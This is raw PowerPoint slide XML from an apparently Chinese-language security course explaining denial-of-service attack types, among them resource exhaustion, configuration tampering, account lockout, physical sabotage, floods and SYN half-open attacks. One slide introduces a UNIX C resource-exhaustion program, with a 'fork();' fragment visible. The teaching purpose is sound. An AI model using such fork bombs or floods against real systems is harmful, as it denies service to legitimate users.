              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>157</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380433345"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DOS的基本模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103427" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>资源耗尽型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55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2500313"/>
            <a:ext cx="80629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158</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34097512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fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="552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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>消耗网络带宽。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有意制造大量的数据报或传输大量文件以占用有限的网络带宽，致使合法用户无法正常使用网络资源。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>消耗磁盘空间。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用磁盘空间的有限性或存储空间大小控制的缺陷，短时间内制造大量的垃圾信息，使系统或用户因没有磁盘空间而停止工作。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>消耗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和内存资源。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>操作系统中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和内存资源由若干进程共用，攻击者利用系统存在的缺陷，过度使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和内存资源，导致系统服务性能下降甚至造成系统崩溃。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104450" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DOS的基本模式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ——(1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>资源耗尽型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="697545" y="3212976"/>
            <a:ext cx="7748910" cy="2714625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr indent="2667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2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>系统中，下面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>程序可消耗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>资源和内存资源的攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>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	fork();</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	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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"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159</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39203900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攻击环节及步骤</a:t>
            </a:r>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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="520584553"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pul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a:t>DOS的基本模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106499" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>配置修改型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="573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28875"/>
            <a:ext cx="878681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1475656" y="5194822"/>
            <a:ext cx="4944020" cy="156966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lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>改变路由信息，造成不能访问网络；</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Windows NT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>注册表；</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>系统的各种配置文件，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>目录下的各种文件。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="下箭头 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3000375" y="4500563"/>
            <a:ext cx="357188" cy="642937"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF000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160</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304253924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7345"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57345"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5734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ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>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ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>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t>(3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基于系统缺陷型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用目标系统和通信协议漏洞，或安全策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如限制用户试探口令次数和注册等待时间。当用户口令输入次数，或注册等待时间超过设定阈值，系统就会停止该用户的使用权。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者有意输错口令导致系统锁定用户帐号，致使该用户得不到应有的服务。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>物理实体破坏型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过破坏或改变系统或网络部件实现拒绝服务攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击目标包括：计算机、路由器、网络配线室、网络主干段、电源、冷却设备。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108546" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DOS的基本模式</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161</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11713666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285750" y="1371600"/>
            <a:ext cx="8534400" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务过载</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>向攻击目标计算机的服务守护进程，发起大量服务请求，使其服务过载。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻击目标处理不断到来的服务请求，无法处理常规的任务。同时，许多新到来的请求被丢弃。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>如果攻击的是一个基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>协议的服务，那么这些请求的包还会被重发，结果更加重了网络的负担。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109571" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DOS攻击的基本形式</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162</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7048702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blinds(horizontal)">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blinds(horizontal)">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blinds(horizontal)">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blinds(horizontal)">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a:t>DOS攻击的基本形式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>消息流</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>向一台网络上的目标主机发送大量的数据报，来延缓目标主机的处理速度，阻止它处理正常的任务。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>这些数据可能是请求文件服务，要求登录或者仅仅是简单的要求响应数据报。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>(3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>信号接地</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>物理方法关闭网络。将网络的电缆接地，引入一些其他信号或者将以太网上的端接器拿走，都可以有效地阻止客户发送或者接收消息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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163</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20552595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a:t>(4) "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>粘住</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的半连接耗尽资源。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者发出多个连接请求。初步建立了连接，但又没有完成其后的连接步骤，接收者便会保留许多这种半连接，占据有限的资源。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通常这些连接请求使用的是伪造的源地址，连接来自于一台不存在的主机或者一台无法访问的主机。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112643" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DOS攻击的基本形式</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164</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20084025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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>资源对抗：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者使用攻击机的资源（时间、计算能力、网络带宽等）消耗受害者的资源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也有四两拨千斤的，例如配置修改型、利用系统或网络缺陷型。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>简单</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
